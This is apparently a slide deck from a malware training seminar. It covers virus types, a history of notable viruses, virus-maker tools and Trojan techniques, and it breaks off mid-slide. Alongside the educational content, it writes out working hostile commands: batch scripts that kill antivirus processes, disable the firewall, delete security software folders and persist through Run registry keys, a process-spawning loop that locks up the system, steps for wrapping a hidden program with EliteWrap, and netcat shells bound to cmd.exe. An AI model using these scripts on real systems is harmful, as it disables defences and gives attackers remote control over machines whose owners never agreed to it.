Malware Seminar WITH CHUCK EASTTOM

About the Speaker  19 Books  32 industry certifications  2 Masters degrees  6 Computer science related patents  Over 20 years experience, over 15 years teaching/training  Helped create CompTIA Security+, Linux+, Server+. Helped revise CEH v8  Frequent consultant/expert witness Get the software for this class at

IMPORTANT  In this lesson you will learn to execute certain attacks. It is important that you understand that doing so on any computer other than a test system or a system you have permission to attack is a serious crime.  This is for you to learn techniques for penetration testing, and to understand the techniques criminals use.  I repeat: MISUSING WHAT IS IN THIS LESSON IS A SERIOUS CRIME.

Why learn it then?  There are several reasons:  Understanding malware helps to combat it.  It is possible to use innocuous ‘malware’ as part of a penetration test. This must only be done with great care and when the malware in question is  Completely innocuous  Not particularly viral (i.e. does not spread easily)  Malware is a primary weapon in cyber warfare and students in this class may be employed by government agencies.

Malware  Virus  Worms  Spyware  Logic Bomb  Rootkit  Annoyances  Browser Hijacker  Scareware  Adware  Pornware

The mechanics of a virus Delivery  a. Via  b. Copying over a network  c. Direct communication with exposed ports. Payload Types Multipartite Boot sector Stealth Armored Encryption Polymorphic/Metamorphic

Virus Types  Armored Virus  An armored virus uses techniques that make it hard to analyze. Code confusion is one such method. The code is written such that if the virus is disassembled, the code won’t be easily followed. Compressed code is another method for armoring the virus.

Virus Types Continued  Sparse Infection Virus  A sparse infection virus will only be active intermittently and for short periods. This makes it much harder to detect. The virus is dormant much of the time and only causes whatever malicious actions it has sporadically. If it is well written, it will only infect at random intervals, not at regular intervals. The intermittent nature of the attack is what makes them so difficult for anti virus to detect. For example the virus may not be active when a virus can is run.  In some cases the sparse infector targets a specific program but the virus only executes every 10 th time or 20 th time that target program executes. Or a sparse infector may have a burst of activity, then lay dormant for a period of time. There are a number of variations on the theme, but the basic principle is the same: to reduce the frequency of attack and thus reduce the chances for detection.

Virus Types Continued  A macro virus is written into a macro in some business application. For example, Microsoft Office allows users to write macros to automate some tasks. Microsoft Outlook is designed so that a programmer can write scripts using a subset of the Visual Basic programming language, called Visual Basic for Applications (VBA). This scripting language is, in fact, built into all Microsoft Office products. Programmers can also use the closely related VBScript language. Both languages are quite easy to learn. If such a script is attached to an and the recipient is using Outlook, then the script can execute. That execution can do any number of things, including scanning the address book, looking for addresses, sending out , deleting , and more.

Encrypted virus  Either to armor or as ransomware  To use encryption the malware needs at least three components:  The actual malware code (which is encrypted).  A module to perform encryption/decryption.  A key.  One of the most widely known examples is the infamous CryptoLocker. It was first discovered in CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected.

Virus Types Continued  A multipartite virus attacks your system in multiple ways, but usually infects the boot sector as well as some other portion of the system. File infection viruses are made to infect some file on the computer, and they spread when the user runs the infected file. Boot sector viruses run when the computer boots up. A multipartite virus does both. For example, a multipartite virus might affect the boot sector and make changes to a specific file or the Windows registry.

Virus Types Continued  More sophisticated IDSs look for common shellcode signatures. But even these systems can be bypassed, by using polymorphic shellcode. One simple technique virus writers use is to encrypt the shellcode by XORing values over the shellcode,using loader code to decrypt the shellcode, and then executing the decrypted shellcode

Ransomeware  One of the most widely known examples is the infamous CryptoLocker. It was first discovered in CryptoLocker utilized asymmetric encryption to lock the user’s files. Several varieties of CryptoLocker have been detected.  CryptoWall is a variant of CryptoLocker first found in August of It looked and behaved much like CryptoLocker. In addition to encrypting sensitive files it would communicate with a command and control server, and even take a screenshot of the infected machine. By March of 2015 a variation of CryptoWall had been discovered which is bundled with the spyware TSPY_FAREIT.YOI and actually steals credentials from the infected system, in addition to holding files for ransom.

History of Viruses  The next few slides give you a history of viruses. This is not on the test. But it helps to give you a context, understanding how viruses have developed will allow you to better understand how they function. 14

History of Viruses  1981 Apple Viruses 1, 2, and 3 are some of the first viruses "in the wild" or public domain. Found on the Apple II operating system, the viruses spread through Texas A&M via pirated computer games.  1980’s In the early 1980s, Fred Cohen did extensive theoretical research, as well as setting up and performing numerous practical experiments, regarding viral type programs. His dissertation was presented in 1986 as part of the requirements for a doctorate in electrical engineering from the University of Southern California. This work is foundational, and any serious student of viral programs disregards it at his own risk Dr. Cohen's definition of a computer virus as "a program that can 'infect' other programs by modifying them to include a... version of itself"  1987 In November, the Lehigh virus was discovered at Lehigh University in the U.S. It was the first "memory resident file infector". A file-infecting virus attacks executable files. It gets control when the file is opened. The Lehigh virus attacked a file called COMMAND.COM. When the file was run (usually by booting from an infected disk), the virus stayed in the resident memory. 15

History of Viruses Continued  1988 In March, the first anti-virus software was written. It was designed to detect and remove the Brain virus and immunized disks against Brain infection.  1990 Viruses combining various characteristics spring up. They included Polymorphism (involves encrypted viruses where the decryption routine code is variable), Armoring (used to prevent anti-virus researchers from dissembling a virus) and Multipartite (can infect both programs and boot sectors).  1991 Symantec releases Norton Anti-Virus software. 16

History of Viruses Continued  1992 Media mayhem greeted the virus Michaelangelo in March. Predictions of massive disruptions were made and anti- virus software sales soared. As it turned out, the cases of the virus were far and few between.  1994 A virus called Kaos4 was posted on a pornography news group file. It was encoded as text and downloaded by a number of users.  1996 Concept, a macro-virus, becomes the most common virus in the world. 17

History of Viruses Continued  1999 The Melissa virus, a macro, appears. It uses Microsoft Word to infect computers and is passed on to others through Microsoft Outlook and Outlook Express programs.  2000 The "I Love You Virus" wreaks havoc around the world. It is transmitted by and when opened, is automatically sent to everyone in the user's address book  July 2001: The Code Red worm infects tens of thousands of systems running Microsoft Windows NT and Windows 2000 server software, causing an estimated $2 billion in damages. The worm is programmed to use the power of all infected machines against the White House Web site at a predetermined date. In an ad hoc partnership with virus hunters and technology companies, the White House deciphers the virus's code and blocks traffic as the worm begins its attack. 18

History of Viruses Continued  2002: Melissa virus author David L. Smith, 33, is sentenced to 20 months in federal prison.  Jan. 2003: The "Slammer" worm infects hundreds of thousands of computers in less than three hours. The fastest-spreading worm ever wreaks havoc on businesses worldwide, knocking cash machines offline and delaying airline flights.  2004 : The "MyDoom" worm becomes the fastest- spreading worm as it causes headaches -- but very little damage -- almost a year to the day after Slammer ran rampant in late January MyDoom uses "social engineering," or low-tech psychological tricks, to persuade people to open the attachment that contains the virus. It claims to be a notification that an message sent earlier has failed, and prompts the user to open the attachment to see what the message text originally said. Many people fall for it. 19

Mac Defender This virus is very interesting for multiple reasons. First because it specifically targets Macintosh computers. Most experts have long agreed that Apple products remained relatively virus free simply because their products did not have enough market share to attract the attention of virus writers. It has long been suspected that if Apple garnered a greater market share, they would also begin to get more virus attacks. That has proven to be true. This virus was first seen in the early months of It is embedded in some web pages and when a user visits those web pages, he or she is given a fake virus scan that tells the user that they have a virus and it needs to be fixed. The “fix” is actually downloading a virus. The point of the virus is to get end users to purchase the MacDefender “antivirus” product. This is the second reason this case is noteworthy. Fake antivirus attacks, also known as scareware, have been becoming increasingly common. 20

FakeAV  This virus first appeared in July It affected Windows systems ranging from Windows 95 to Windows 7 and Windows server This was a fake anti-virus (thus the name FakeAV). It would popup fake virus warnings. This was not the first such fake anti-virus malware, but it was one of the more recent ones.  Symantec FakeAV eup.jsp?docid= &tabid=2 21

Levels of virus creation skill From least skilled to most skilled: 1. Use a GUI tool 2. Use a batch file virus or simple macro virus 3. Alter existing virus code 4. Write your own from scratch 5. Write your own from scratch that is a stealthy and self destructs.

Making a Virus  Terabit Virus Maker  JPS Virus Maker  Internet Worm Maker Thing  Source code for various viruses  Online virus writing resource asp?CatId=52 asp?CatId=52  I love you virus source code   Melissa Source code  melissa.txt melissa.txt

Tools  There are a variety of virus/Trojan/worm creation tools.  One very good website is vxheaven.org  You will also see some on the following slides

Terabit Virus Maker

Simple VBS virus Great for penetration testing: Dim msg, sapi msg="You have violated security policies" Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg

Disable the internet (must be a bat file) off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE

Endless loop off :top START %SystemRoot%\system32\notepad.exe GOTO top You can use notepad, calc, anything you like. But it keeps launching copies until the system is locked up.

Batch file virus  Turns off target security echo off  rem --  rem Permanently Kill Anti-Virus  net stop “Security Center”  netsh firewall set opmode mode=disable  tskill /A av*  tskill /A fire*  tskill /A anti*  tskill /A mcafe*  tskill /A panda*  tskill /A PersFw  tskill /A KAV*  tskill /A ZONEALARM  del /Q /F C:\Program Files\alwils~1\avast4\*.*  del /Q /F C:\Program Files\Norton~1\*.cnt  del /Q /F C:\Program Files\Mcafee\*.*  del /Q /F C:\Program Files\kaspersky\*.* This uses basic Command line tools Tskill kills tasks Del deletes files and directories The del flags are /F Ignore read-only setting and delete anyway (FORCE) /Q Quiet mode, do not give a Yes/No Prompt before deleting /S Delete from all Subfolders (DELTREE)

Using the powershell Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop Keeps pressing the enter key every 100 milliseconds, You can replace with any other key.

Virus Writing Techniques  WMIC  Spyware with GINA.dll

wmic  The Windows Management Instrumentation Command-line ( WMIC ). It can be scripted  us/library/aa394531(v=vs.85).aspx us/library/aa394531(v=vs.85).aspx  us/library/bb aspx

wmic  wmic diskdrive list

wmic  wmic useraccount list

Spyware creation techniques  Microsoft Graphical Identification and Authentication Dynamic Link Library (MSGINA DLL). It is loaded by the Winlogon executable during login. It allows third party customizations of the login by loading their own DLL between WinLogon and GINA.dll   us/library/windows/desktop/aa380543(v=vs.85).aspx us/library/windows/desktop/aa380543(v=vs.85).aspx  us/library/windows/desktop/aa374744(v=vs.85).aspx  Here is where you find such a dll IF it exists  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL  This would be advanced spyware and not common

Spyware continued  There can be legitimate third party modifications to gina.dll such as these:

Determine the domain  C++ code that determines the domain

Self-Destruct  C++ code that self destructs

Trojan Horse Tools  EliteWrapper  ADS  using Alternate Data Streams  Attach a file to a text  type notepad.exe > ADSFile.txt:notepad.exe  Attach a script to a file  type somescript.vbs> ADSFile.txt:somescript.vbs  Brief tutorial abusing-alternate-data.html abusing-alternate-data.html

Using EliteWrap  You will have to temporarily turn off your anti virus then download elitewrap from   Enter the file you want to run that is visible  Enter operation  1 - Pack only  2 - Pack and execute, visible, asynchronously  3 - Pack and execute, hidden, asynchronously  4 - Pack and execute, visible, synchronously  5 - Pack and execute, hidden, synchronously  6 - Execute only, visible, asynchronously  7 - Execute only, hidden, asynchronously  8 - Execute only, visible, synchronously  9 - Execute only, hidden, synchronously  Enter command line  Enter Second file (the item you are surreptitiously installing.  Enter operation  When done with files, press enter

EliteWrap Example

EliteWrap continued  Note the file size. The text.exe is only slightly bigger than the other file. If you pack them.

EliteWrap continued  More importantly when you run elitetest.exe you only see calculator running, you don’t see the second program. But it clearly is loaded and running. And stays loaded after the original cover program (calc.exe) is closed.

Using netcat  Attach netcat to some other tool using any wrapper (like elitewrap)  Have it run nc -l –p 80  You have just opened a reverse shell on the infected machine.  Netcat cheat sheet from SANS  resources/sec560/netcat_cheat_sheet_v1.pdf resources/sec560/netcat_cheat_sheet_v1.pdf

Basic Video Tutorial

Basic Netcat commands  Receiving files  nc -l 1001> received_file  Command shell  nc -l -p 1001-e cmd.exe  Connect to that shell  nc --ssl

Other Trojan & Related Tools  RemoteByMail Take control of a target machine remotely via  Dark Comet RAT: Take control of a machine remotely  RAT is Remote Access Trojan

Botnets  Groups of computers that are unaware they are being used as attackers. They are referred to as zombies.  There are tools for creating and managing botnets  Poison Ivy rat.com/index.php?link=downloadhttp:// rat.com/index.php?link=download  Illusions  Zeus

Now more in depth  Screen capture spyware  Code is in class handout in C# complete working code  Capture data  Send s